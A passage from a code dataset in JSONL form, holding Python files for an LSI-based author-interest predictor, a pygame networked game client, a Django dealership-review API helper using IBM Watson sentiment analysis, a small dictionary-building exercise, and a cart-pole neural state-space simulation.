"call"}, {"api_name": "numpy.r_", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 166, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.r_", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.fliplr", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 169, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 196, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 201, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.fft.ifft", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 203, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 213, "usage_type": "call"}, {"api_name": "math.log2", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.stackplot", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}]} +{"seq_id": "621419958", "text": "\"\"\"\nСоздать два списка с различным количеством элементов. В первом должны быть записаны ключи, во втором — значения.\nНеобходимо написать функцию, создающую из данных ключей и значений словарь. Если ключу не хватает значения,\nв словаре для него должно сохраняться значение None. Значения, которым не хватило ключей, необходимо отбросить.\n\"\"\"\n\nfrom itertools import zip_longest\n\n\ndef generate_array(pref, size):\n return [f'{pref}_{i}' for i in range(size)]\n\n\ndef main():\n keys = generate_array('key', int(input('введите длину списка ключей:\\n')))\n values = generate_array('values', int(input('введите длину списка значений:\\n')))\n result = {key: value for key, value in zip_longest(keys, values) if key}\n print(f'список ключей:\\n {keys} \\n список значений:\\n {values} \\n получили словарь:\\n {result}')\n\n\nif __name__ == '__main__':\n main()", "sub_path": "Lesson_3/3.py", "file_name": "3.py", "file_ext": "py", "file_size_in_byte": 1218, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "itertools.zip_longest", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "562543631", "text": "#-*-coding:utf-8-*-\n\nfrom __future__ import division\nfrom gensim import corpora,models,similarities\nfrom collections import Counter,defaultdict\nimport codecs\nimport json\n\n#interest_paper_path = 'interest_paper_from_neighbors.json'\ndef extract_paper_for_interest():\n\n with codecs.open(\"t_author_paper.json\",\"r\",\"utf-8\") as fid:\n t_author_paper = json.load(fid)\n\n with codecs.open(\"author_interest.json\",\"r\",\"utf-8\") as fid:\n author_interest = json.load(fid)\n\n interest_paper = {}\n for author,interest_list in author_interest.items():\n for interest in interest_list:\n for paper in t_author_paper[author]:\n interest_paper.setdefault(interest,[]).append(paper)\n\n with codecs.open(\"interest_paper.json\",\"w\",\"utf-8\") as fid:\n json.dump(interest_paper,fid,ensure_ascii=False)\n\n\ndef create_dictionary():\n\n print (\"create dictionary ...\")\n with codecs.open(\"interest_paper.json\",\"r\",\"utf-8\") as fid:\n interest_paper = json.load(fid)\n\n interest_seq = []\n paper_seq = []\n\n for interest,paper in interest_paper.items():\n interest_seq.append(interest)\n text = ' '.join(paper)\n text = clean_data(text)\n paper_seq.append(text)\n #paper_seq = remove_once_appearance(paper_seq,2)\n\n dictionary = corpora.Dictionary(paper_seq)\n corpus = [dictionary.doc2bow(text) for text in paper_seq]\n return (interest_seq,dictionary,corpus)\n\ndef remove_once_appearance(text_list,n):\n frequency = defaultdict(int)\n for text in text_list:\n for token in text:\n frequency[token] += 1\n text_list = [[token for token in text if frequency[token] > n] for text in text_list]\n return text_list\n\ndef clean_data(text):\n\n stop_list = set()#set('a is are on from for and not to that') #this there these those have has been were I you me they can could be do . , : ! ? '.split())\n text = [word for word in text.lower().split() if word not in stop_list]\n return text\n\n\n\ndef create_lsi_model(num_topics,dictionary,corpus):\n\n print (\"create lsi model ...\")\n tfidf_model = models.TfidfModel(corpus)\n corpus_tfidf = tfidf_model[corpus]\n lsi_model = models.LsiModel(corpus_tfidf,id2word=dictionary,num_topics = num_topics)\n corpus_lsi = lsi_model[corpus_tfidf]\n corpus_simi_matrix = similarities.MatrixSimilarity(corpus_lsi)\n\n #record_papers_tfidf(corpus_tfidf)\n return (tfidf_model,lsi_model,corpus_simi_matrix)\n\n\ndef record_papers_tfidf(corpus_tfidf):\n print(\"record papers' tfidf ...\")\n fid_result = codecs.open(\"corpus_tfidf_papers\",\"w\",\"utf-8\")\n for token in corpus_tfidf:\n tfidf_list = []\n for v in token:\n tfidf_list.append(str(v[0])+\":\"+str(v[1]))\n fid_result.write('\\t'.join(tfidf_list)+'\\n')\n fid_result.close()\n\n\ndef read_test_data(json_name):\n\n with codecs.open(json_name,\"r\",\"utf-8\") as fid:\n author_paper = json.load(fid)\n\n return author_paper\n\ndef predict_n_interest(author_paper,interest_seq,dictionary,corpus,tfidf_model,lsi_model,corpus_simi_matrix):\n\n print (\"predict interest ...\")\n predict_author_interest = {}\n for author,paper in author_paper.items():\n interest = []\n test_text = clean_data(' '.join(paper))\n test_bow = dictionary.doc2bow(test_text)\n test_tfidf = tfidf_model[test_bow]\n test_lsi = lsi_model[test_tfidf]\n test_simi = corpus_simi_matrix[test_lsi]\n\n result = list(enumerate(test_simi))\n result.sort(key=lambda x:x[1])\n\n for v in result[-10:]:\n interest.append(interest_seq[v[0]])\n interest.extend(['']*(5-len(interest)))\n predict_author_interest.setdefault(author,interest)\n\n with codecs.open(\"p_author_interest_lsi_10.json\",\"w\",\"utf-8\") as fid:\n json.dump(predict_author_interest,fid,ensure_ascii=False)\n\n return predict_author_interest\n\ndef print_validation_result(predict_author_interest,author_list,author_interest,num_topics):\n\n print (len(author_interest.keys()))\n print (len(predict_author_interest.keys()))\n\n with codecs.open(\"result_predict_by_interest_p.txt\",\"a\",\"utf-8\") as fid:\n accuracy = 0\n for author in author_list:\n accuracy = accuracy + (len(set(predict_author_interest[author])&set(author_interest[author])))/3\n #fid.write(author+'\\t'+str(len(set(predict_author_interest[author])&set(author_interest[author])))+'\\n')\n fid.write(str(num_topics)+'\\t'+str(accuracy/6000)+'\\n')\n\ndef print_final_result(predict_author_interest,author_list,author_interest,num_topics):\n\n\n fid_result = codecs.open(\"interst_from_interest_800.txt\",\"w\",\"utf-8\")\n\n with codecs.open(\"validation.txt\",\"r\",\"utf-8\") as fid:\n for line in fid:\n if line == '\\n':\n continue\n author = line.strip()\n fid_result.write(author + '\\t' + '\\t'.join(predict_author_interest[author])+'\\n')\n\n\n\nif __name__ == '__main__':\n #extract_paper_for_interest()\n with codecs.open(\"author_interest.json\",\"r\",\"utf-8\") as fid:\n author_interest = json.load(fid)\n\n author_list = list(author_interest.keys())\n\n vali_data = read_test_data(\"t_author_paper.json\")\n test_data = read_test_data(\"p_author_paper.json\")\n (interest_seq,dictionary,corpus) = create_dictionary()\n\n for num_topics in range(800,860,60):\n (tfidf_model,lsi_model,corpus_simi_matrix) = create_lsi_model(num_topics,dictionary,corpus)\n predict_author_interest = predict_n_interest(test_data,interest_seq,dictionary,corpus,tfidf_model,lsi_model,corpus_simi_matrix)\n print_final_result(predict_author_interest,author_list,author_interest,num_topics)\n", "sub_path": "predict_by_interest.py", "file_name": "predict_by_interest.py", "file_ext": "py", "file_size_in_byte": 5676, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "codecs.open", "line_number": 12, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 15, "usage_type": "call"}, {"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 25, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 31, "usage_type": "call"}, {"api_name": "json.load", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 44, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 44, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 49, "usage_type": "call"}, {"api_name": "gensim.models.TfidfModel", "line_number": 67, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 67, "usage_type": "name"}, {"api_name": "gensim.models.LsiModel", "line_number": 69, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 69, "usage_type": "name"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 71, "usage_type": "call"}, {"api_name": "gensim.similarities", "line_number": 71, "usage_type": "name"}, {"api_name": "codecs.open", "line_number": 79, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 90, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 115, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 116, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 125, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 135, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 137, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 148, "usage_type": "call"}, {"api_name": "json.load", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "267714064", "text": "import pygame\nfrom textbox import TextBox\nimport sys\nimport socket\nfrom threading import Thread\nfrom Protocol import Protocol\nfrom physics import Ball\nfrom pygame.color import THECOLORS\n\nsize = width, height = 640, 480 # 设置窗口大小\nscreen = pygame.display.set_mode(size) # 显示窗口\nADDRESS = ('127.0.0.1', 8712) # ('foxyball.cn', 8712) # 如果服务端在本机,请使用('127.0.0.1', 8712)\ng_client = socket.socket() # 创建 socket 对象\nothers = []\nmy = Ball(100,100,0,0,\"why\")\ndef init():\n pygame.init() # 初始化pygame\n # 与服务器建立连接\n g_client.connect(ADDRESS)\n # 开始接受服务端消息\n thead = Thread(target=msg_handler)\n thead.setDaemon(True)\n thead.start()\n my = Ball(100,100,0,0,\"why\")\n # 告诉服务端有新玩家\n send_new_role()\n return\ndef loop():\n while True: # 死循环确保窗口一直显示\n pygame.time.delay(32)\n my.move()\n for event in pygame.event.get(): # 遍历所有事件 \n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a:\n my.vx = -2\n if event.key == pygame.K_d:\n my.vx = 2\n if event.key == pygame.K_SPACE:\n my.jump()\n send_role_move() # 告诉服务器,自己移动了\n if event.type == pygame.KEYUP:\n my.stop()\n screen.fill((255,255,255))\n pygame.draw.circle(screen,THECOLORS[\"red\"],[my.x,my.y],10,0)\n for r in others:\n pygame.draw.circle(screen,THECOLORS[\"red\"],[r.x,r.y],10,0)\n pygame.display.flip()\ndef send_new_role():\n p = Protocol()\n p.add_str(\"newrole\")\n p.add_int32(my.x) \n p.add_int32(my.y) \n p.add_str(my.name) \n data = p.get_pck_has_head() \n # 发送数据包 \n g_client.sendall(data)\ndef send_role_move():\n \"\"\"\n 发送角色的坐标给服务端\n \"\"\"\n # 构建数据包\n p = Protocol()\n p.add_str(\"move\")\n p.add_int32(my.x)\n p.add_int32(my.y)\n data = p.get_pck_has_head()\n # 发送数据包\n g_client.sendall(data)\ndef pck_handler(pck):\n p = Protocol(pck)\n pck_type = p.get_str()\n if pck_type == 'playermove': # 玩家移动的数据包\n x = p.get_int32()\n y = p.get_int32()\n name = p.get_str()\n for r in others:\n if r.name == name:\n r.x = x\n r.y = y\n break\n elif pck_type == 'newplayer': # 新玩家数据包\n x = p.get_int32()\n y = p.get_int32()\n name = p.get_str()\n r = Ball(x, y, 0, 0, name)\n others.append(r)\n elif pck_type == 'logout': # 玩家掉线\n name = p.get_str()\n for r in others:\n if r.name == name:\n others.remove(r)\n break\ndef msg_handler():\n \"\"\"\n 处理服务端返回的消息\n \"\"\"\n while True:\n bytes = g_client.recv(1024)\n # 以包长度切割封包\n while True:\n # 读取包长度\n length_pck = int.from_bytes(bytes[:4], byteorder='little')\n # 截取封包\n pck = bytes[4:4 + length_pck]\n # 删除已经读取的字节\n bytes = bytes[4 + length_pck:]\n # 把封包交给处理函数\n pck_handler(pck)\n # 如果bytes没数据了,就跳出循环\n if len(bytes) == 0:\n break\n\nif __name__ == '__main__':\n init()\n loop()\n pygame.quit()", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3608, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.display.set_mode", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.socket", "line_number": 13, "usage_type": "call"}, {"api_name": "physics.Ball", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 17, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 21, "usage_type": "call"}, {"api_name": "physics.Ball", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.time.delay", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.color.THECOLORS", "line_number": 46, "usage_type": "name"}, {"api_name": "pygame.draw.circle", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.color.THECOLORS", "line_number": 48, "usage_type": "name"}, {"api_name": "pygame.display.flip", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Protocol.Protocol", "line_number": 51, "usage_type": "call"}, {"api_name": "Protocol.Protocol", "line_number": 64, "usage_type": "call"}, {"api_name": "Protocol.Protocol", "line_number": 72, "usage_type": "call"}, {"api_name": "physics.Ball", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "305336408", "text": "import requests\nimport json\nfrom .models import CarDealer, CarReview\nfrom requests.auth import HTTPBasicAuth\n\n\n# https://realpython.com/python-kwargs-and-args/\n\n#\ndef get_request(url, **kwargs):\n print(kwargs)\n print(\"GET from {} \".format(url))\n try:\n # Call get method of requests library with URL and parameters\n # response = requests.get(url, headers={'Content-Type': 'application/json'},params=kwargs)\n if 'api_key' in kwargs:\n # Basic authentication GET\n response = requests.get(url, headers={'Content-Type': 'application/json'}, params=kwargs,\n auth=HTTPBasicAuth('apikey', kwargs['api_key']))\n else:\n # no authentication GET\n response = requests.get(url, headers={'Content-Type': 'application/json'}, params=kwargs)\n except:\n # If any error occurs\n print(\"Network exception occurred\")\n status_code = response.status_code\n print(\"With status {} \".format(status_code))\n json_data = json.loads(response.text)\n return json_data\n\n\n# WASON NLU SERVICE\nfrom ibm_watson import NaturalLanguageUnderstandingV1\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom ibm_watson.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions\n\n\ndef analyze_review_sentiments(dealerreview):\n api_key = API_KEY\n url = URL_NLU\n #\n authenticator = IAMAuthenticator(api_key)\n natural_language_understanding = NaturalLanguageUnderstandingV1(\n version='2021-03-25',\n authenticator=authenticator)\n\n natural_language_understanding.set_service_url(url)\n response = natural_language_understanding.analyze(\n text=dealerreview,\n features=Features(\n entities=EntitiesOptions(emotion=True, sentiment=True, limit=2),\n keywords=KeywordsOptions(emotion=True, sentiment=True,\n limit=2))).get_result()\n # print(json.dumps(response, indent=2))\n #\n try:\n resultado = response['keywords'][0]['sentiment']['label']\n except:\n resultado = 'neutral'\n return resultado\n\n\n#\ndef get_dealers_from_cf(url, **kwargs):\n results = []\n # Call get_request with a URL parameter\n json_result = get_request(url)\n # print(json_result)\n if json_result:\n # Get the row list in JSON as dealers\n dealers = json_result[\"rows\"]\n # For each dealer object\n for dealer in dealers:\n # Get its content in `doc` object\n # dealer_doc = dealer[\"doc\"]\n print(dealer)\n dealer_doc = dealer\n # Create a CarDealer object with values in `doc` object\n dealer_obj = CarDealer(city=dealer_doc[\"city\"],\n address=dealer_doc[\"address\"], full_name=dealer_doc[\"full_name\"],\n short_name=dealer_doc[\"short_name\"],\n id=dealer_doc[\"id\"], lat=dealer_doc[\"lat\"], long=dealer_doc[\"long\"],\n st=dealer_doc[\"st\"], zip=dealer_doc[\"zip\"])\n # address=dealer_doc[\"address\"], full_name=dealer_doc[\"full_name\"],short_name=dealer_doc[\"short_name\"],\n results.append(dealer_obj)\n return results\n\n\n# get dealer reviews\ndef get_dealers_reviews_from_cf(url, **kwargs):\n # Call get_request with a URL parameter\n results = []\n dealer_id = kwargs['dealer_id']\n # json_result = get_request(url,dealer_id=dealer_id) ###############\n url = 'https://0f2f6a44.us-south.apigw.appdomain.cloud/reviews/review'\n data = {\"dealerid\": dealer_id}\n response = requests.get(url, json=data)\n json_result = json.loads(response.text)\n # print(json_result)\n if json_result:\n # Get the row list in JSON as dealers\n dealers = json_result[\"rows\"]\n # For each dealer object\n for dealer in dealers:\n # Get its content in `doc` object\n # dealer_doc = dealer[\"doc\"]\n dealer_doc = dealer\n #\n sentiment = analyze_review_sentiments(dealer_doc['review'])\n # sentiment = 'negative'\n # Create a CarDealer object with values in `doc` object\n dealer_obj = CarReview(dealership=dealer_doc[\"dealership\"],\n name=dealer_doc[\"name\"],\n purchase=dealer_doc[\"purchase\"],\n id=dealer_doc[\"id\"],\n review=dealer_doc[\"review\"],\n purchase_date=\"\", #\n car_make=dealer_doc[\"car_make\"],\n car_model=dealer_doc[\"car_model\"],\n car_year=dealer_doc[\"car_year\"],\n sentiment=sentiment)\n results.append(dealer_obj)\n return results\n\n# POST\ndef post_request(url, json_payload, **kwargs):\n requests.post(url, json=json_payload)\n return\n\n\nimport datetime\nfrom .models import CarModel, CarMake\n\n\n# cargar datos\ndef cargarDatos(request):\n marcas = ['Audi', 'Subaru', 'Honda']\n modelos = ['s1', 'a1', 'w20', 'h2']\n anios = [datetime.datetime.now().year, datetime.datetime.now().year]\n for i in range(1, 50):\n dealerid = i\n #\n m = CarMake(name=marcas[0])\n m.save()\n CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[0], year='2019-01-01')\n CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[1], year='2014-01-01')\n #\n m = CarMake(name=marcas[1])\n m.save()\n CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[0], year='2019-01-01')\n CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[1], year='2015-01-01')\n #\n m = CarMake(name=marcas[2])\n m.save()\n CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[0], year='2019-01-01')\n CarModel.objects.create(model_id=m.id, dealer_id=i, name=modelos[1], year='2017-01-01')\n return\n\n\n\n\n# NLU\nAPI_KEY = '**********'\nURL_NLU = '**********'\n", "sub_path": "server/djangoapp/restapis.py", "file_name": "restapis.py", "file_ext": "py", "file_size_in_byte": 6164, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}, {"api_name": "ibm_cloud_sdk_core.authenticators.IAMAuthenticator", "line_number": 42, "usage_type": "call"}, {"api_name": "ibm_watson.NaturalLanguageUnderstandingV1", "line_number": 43, "usage_type": "call"}, {"api_name": "ibm_watson.natural_language_understanding_v1.Features", "line_number": 50, "usage_type": "call"}, {"api_name": "ibm_watson.natural_language_understanding_v1.EntitiesOptions", "line_number": 51, "usage_type": "call"}, {"api_name": "ibm_watson.natural_language_understanding_v1.KeywordsOptions", "line_number": 52, "usage_type": "call"}, {"api_name": "models.CarDealer", "line_number": 79, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 98, "usage_type": "call"}, {"api_name": "models.CarReview", "line_number": 112, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.CarMake", "line_number": 143, "usage_type": "call"}, {"api_name": "models.CarModel.objects.create", "line_number": 145, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 145, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 145, "usage_type": "name"}, {"api_name": "models.CarModel.objects.create", "line_number": 146, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 146, "usage_type": "name"}, {"api_name": "models.CarMake", "line_number": 148, "usage_type": "call"}, {"api_name": "models.CarModel.objects.create", "line_number": 150, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 150, "usage_type": "name"}, {"api_name": "models.CarModel.objects.create", "line_number": 151, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 151, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 151, "usage_type": "name"}, {"api_name": "models.CarMake", "line_number": 153, "usage_type": "call"}, {"api_name": "models.CarModel.objects.create", "line_number": 155, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 155, "usage_type": "name"}, {"api_name": "models.CarModel.objects.create", "line_number": 156, "usage_type": "call"}, {"api_name": "models.CarModel.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.CarModel", "line_number": 156, "usage_type": "name"}]} +{"seq_id": "335960634", "text": "import os\nimport pandas as pd\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(os.path.join(\"..\"))\nfrom torchid.ssfitter import NeuralStateSpaceSimulator\nfrom torchid.ssmodels import CartPoleStateSpaceModel\n\n\nif __name__ == '__main__':\n\n plt.close(\"all\")\n COL_T = ['time']\n COL_Y = ['p_meas', 'theta_meas']\n COL_X = ['p', 'v', 'theta', 'omega']\n COL_U = ['u']\n COL_R = ['r']\n df_X = pd.read_csv(os.path.join(\"data\", \"pendulum_data_MPC.csv\"))\n\n\n std_noise_p = 0.01\n std_noise_phi = 0.002\n std_noise = np.array([std_noise_p, std_noise_phi])\n\n t = np.array(df_X[COL_T], dtype=np.float32)\n x = np.array(df_X[COL_X],dtype=np.float32)\n y = np.array(df_X[COL_Y],dtype=np.float32)\n y = np.copy(x[:, [0, 2]])\n u = np.array(df_X[COL_R],dtype=np.float32)\n Ts = t[1] - t[0]\n n_x = x.shape[-1]\n\n x0_torch = torch.from_numpy(x[0,:])\n# x_noise = np.copy(x) + np.random.randn(*x.shape)*std_noise\n# x_noise = x_noise.astype(np.float32)\n y_noise = np.copy(y) + np.random.randn(*y.shape)*std_noise\n y_noise = y_noise.astype(np.float32)\n\n # In[Load model] \n ss_model = CartPoleStateSpaceModel(Ts)\n nn_solution = NeuralStateSpaceSimulator(ss_model)\n #model_name = \"model_OE_minibatch_100.pkl\" \n model_name = \"model_ARX_FE_ref_nonoise.pkl\"\n nn_solution.ss_model.load_state_dict(torch.load(os.path.join(\"models\", model_name)))\n \n # In[Simulation plot]\n \n x_torch = torch.tensor(x)\n x0_torch = torch.tensor(x[0,:])\n u_torch = torch.tensor(u)\n t_torch = torch.tensor(t)\n with torch.no_grad():\n x_sim_torch = nn_solution.f_sim(x0_torch, u_torch)\n loss = torch.mean(torch.abs(x_sim_torch - x_torch))\n\n x_sim = np.array(x_sim_torch)\n\n n_plot = t.size\n fig,ax = plt.subplots(3,1,sharex=True)\n ax[0].plot(t[:n_plot], x[:n_plot, 0], label='True')\n ax[0].plot(t[:n_plot], x_sim[:n_plot, 0], label='Simulated')\n ax[0].set_xlabel(\"Time (s)\")\n ax[0].set_ylabel(\"Cart position (m)\")\n ax[0].legend()\n ax[0].grid()\n\n ax[1].plot(t[:n_plot], x[:n_plot, 2], label='True')\n ax[1].plot(t[:n_plot], x_sim[:n_plot, 2], label='Simulated')\n ax[1].set_xlabel(\"Time (s)\")\n ax[1].set_ylabel(\"Pendulum angle (rad)\")\n ax[1].legend()\n ax[1].grid()\n\n ax[2].plot(t[:n_plot], u[:n_plot, 0])\n ax[2].set_xlabel(\"Time (s)\")\n ax[2].set_ylabel(\"Input Force (V)\")\n #ax[2].legend()\n ax[2].grid()\n\n \n # In[Generate batches]\n len_sim = x.shape[0]\n seq_len = 100\n dist_sim = 100\n \n s = np.arange(0, len_sim - seq_len ,dist_sim, dtype = np.int )\n batch_size = len(s)\n batch_x0 = x_torch[s, :] # (M, D)\n batch_t = torch.stack([t_torch[s[i]:s[i] + seq_len] for i in range(batch_size)], dim=0)\n batch_x = torch.stack([x_torch[s[i]:s[i] + seq_len] for i in range(batch_size)], dim=0)\n batch_u = torch.stack([u_torch[s[i]:s[i] + seq_len] for i in range(batch_size)], dim=0)\n\n # In[ZOH baseline performance]\n #zoh_error = batch_x -batch_x0.view(batch_size,1,n_x)\n #scale_error = torch.sqrt(torch.mean(zoh_error**2,(0,1))) \n\n # In[Predictor performance]\n\n batch_x_pred = nn_solution.f_sim_multistep(batch_x0, batch_u)\n batch_x_np = batch_x_pred.clone().data.cpu().numpy()\n batch_t_np = batch_t.clone().data.cpu().numpy()\n #err = batch_x[:,1:,:] - batch_x_pred[:,1:,:]\n #err_scaled = err * scale_error \n #loss = torch.mean(err_scaled**2)\n \n # In[Performance plot]\n \n \n fig,ax = plt.subplots(4,1,figsize=(20,10), sharex=True)\n ax[0].plot(t[:n_plot], y_noise[:n_plot, 0], 'k', label='Measured')\n ax[0].plot(batch_t_np[:,:,0].T, batch_x_np[:,:,0].T, 'r', linewidth=3)\n ax[0].set_xlabel(\"Time (s)\")\n ax[0].set_ylabel(\"Position p (m)\")\n ax[0].legend()\n ax[0].grid()\n\n ax[1].plot(t[:n_plot], x[:n_plot, 1], label='True')\n ax[1].plot(batch_t_np[:,:,0].T, batch_x_np[:,:,1].T, 'r',linewidth=3)\n ax[1].set_xlabel(\"Time (s)\")\n ax[1].set_ylabel(\"Speed v (m/s)\")\n ax[1].legend()\n ax[1].grid()\n\n ax[2].plot(t[:n_plot], y_noise[:n_plot, 1], 'k', label='Measured')\n ax[2].plot(batch_t_np[:,:,0].T, batch_x_np[:,:,2].T, 'r',linewidth=3)\n ax[2].plot(t[:n_plot], x[:n_plot, 2], label='True')\n ax[2].set_xlabel(\"Time (s)\")\n ax[2].set_ylabel(\"Angle $\\phi$ (rad)\")\n ax[2].legend()\n ax[2].grid()\n\n ax[3].plot(t[:n_plot], x[:n_plot, 3], label='True')\n ax[3].plot(batch_t_np[:,:,0].T, batch_x_np[:,:,3].T, 'r',linewidth=3)\n ax[3].set_xlabel(\"Time (s)\")\n ax[3].set_ylabel(\"Angular velocity $\\omega$ (rad/s)\")\n ax[3].legend()\n ax[3].grid()\n \n # In[Kalman filter setup]\n n_x = 4\n n_u = 1\n VAR = []\n for idx_var in range(n_x):\n var = np.zeros((1,n_x)).astype(np.float32)\n var[0,idx_var] = 1.0 # differentiate w.r.t the nth variable\n VAR.append(torch.tensor(var))\n\n\n # In[Kalman filter]\n C = np.array([[1., 0., 0., 0.],\n [0., 0., 1., 0.]], dtype=np.float32)\n \n Q_kal = np.diag([0.01, 1, 0.01, 1]).astype(np.float32)\n R_kal = 10.0*np.eye(2).astype(np.float32),\n \n x_est_post_vec = np.zeros((t.size, n_x)).astype(np.float32)\n x_est_pri_vec = np.zeros((t.size, n_x)).astype(np.float32)\n\n x_est_pri = x[0, :] # x[0|-1]\n P_pri = np.diag([0.01, 100, 0.01, 100]).astype(np.float32) # P[0|-1]\n I_nx = np.eye(n_x, n_x).astype(np.float32)\n\n for time_idx in range(len(t)):\n ui = u[time_idx,:]\n yi = y_noise[time_idx,:]\n\n xi_torch = torch.tensor(x_est_pri, requires_grad=True) # measurement\n ui_torch = torch.tensor(ui, requires_grad=True)\n\n x_est_pri_vec[time_idx] = x_est_pri\n\n f_xu = ss_model(xi_torch, ui_torch)\n Ak = np.empty((n_x, n_x),dtype=np.float32)\n Bk = np.empty((n_x, n_u), 